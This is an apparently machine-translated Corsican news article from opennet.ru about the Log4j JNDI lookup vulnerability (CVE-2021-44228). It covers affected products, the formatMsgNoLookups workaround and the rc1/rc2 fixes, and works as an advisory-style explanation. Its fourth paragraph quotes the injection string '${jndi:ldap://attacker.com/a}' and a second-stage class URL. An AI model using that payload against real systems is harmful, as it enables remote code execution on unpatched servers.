In Apache Log4j, un framework populari per urganizà u logu in l'applicazioni Java, hè stata identificata una vulnerabilità critica chì permette à u codice arbitrariu per esse eseguitu quandu un valore furmatu apposta in u formatu "{jndi:URL}" hè scrittu à u log. L'attaccu pò esse realizatu nantu à l'applicazioni Java chì registranu i valori ricivuti da fonti esterne, per esempiu, quandu mostranu valori problematiche in missaghji d'errore.
Hè nutatu chì quasi tutti i prughjetti chì utilizanu frameworks cum'è Apache Struts, Apache Solr, Apache Druid o Apache Flink sò affettati da u prublema, cumpresu Steam, Apple iCloud, Clienti Minecraft è servitori. Hè previstu chì a vulnerabilità puderia guidà à una onda di attacchi massivi à l'applicazioni corporative, ripetendu a storia di vulnerabili critichi in u framework Apache Struts, chì, secondu una stima approssimativa, hè utilizatu in l'applicazioni web da u 65% di Fortune. 100 cumpagnie inclusi i tentativi di scansà a rete per i sistemi vulnerabili.
U prublema hè aggravatu da u fattu chì un sfruttamentu di travagliu hè digià publicatu, ma i correzioni per i rami stabili ùn sò micca stati cumpilati. L'identificatore CVE ùn hè ancu statu assignatu. A correzione hè inclusa solu in u ramu di teste log4j-2.15.0-rc1. Cum'è una soluzione per bluccà a vulnerabilità, hè cunsigliatu di stabilisce u paràmetru log4j2.formatMsgNoLookups à veru.
U prublema hè stata causata da u fattu chì log4j supporta l'elaborazione di maschere speciale "{}" in linee di output à u logu, in quale e dumande JNDI (Java Naming and Directory Interface) puderanu esse eseguite. L'attaccu si riduce à passà una stringa cù a sustituzione "${jndi:ldap://attacker.com/a}", dopu a trasfurmazioni chì log4j mandarà una dumanda LDAP per u percorsu à a classa Java à u servitore attacker.com. . A strada tornata da u servitore di l'attaccante (per esempiu, http://second-stage.attacker.com/Exploit.class) serà caricata è eseguita in u cuntestu di u prucessu attuale, chì permette à l'attaccante di eseguisce codice arbitrariu nantu à u sistema cù i diritti di l'applicazione attuale.
Addendum 1: A vulnerabilità hè stata attribuita à l'identificatore CVE-2021-44228.
Addendum 2: Un modu per passà a prutezzione aghjuntu da a liberazione log4j-2.15.0-rc1 hè stata identificata. Una nova aghjurnazione, log4j-2.15.0-rc2, hè stata pruposta cù una prutezzione più cumpleta contra a vulnerabilità. U codice mette in risaltu u cambiamentu assuciatu cù l'absenza di una terminazione anormale in u casu di utilizà un URL JNDI formatatu incorrectamente.
Source: opennet.ru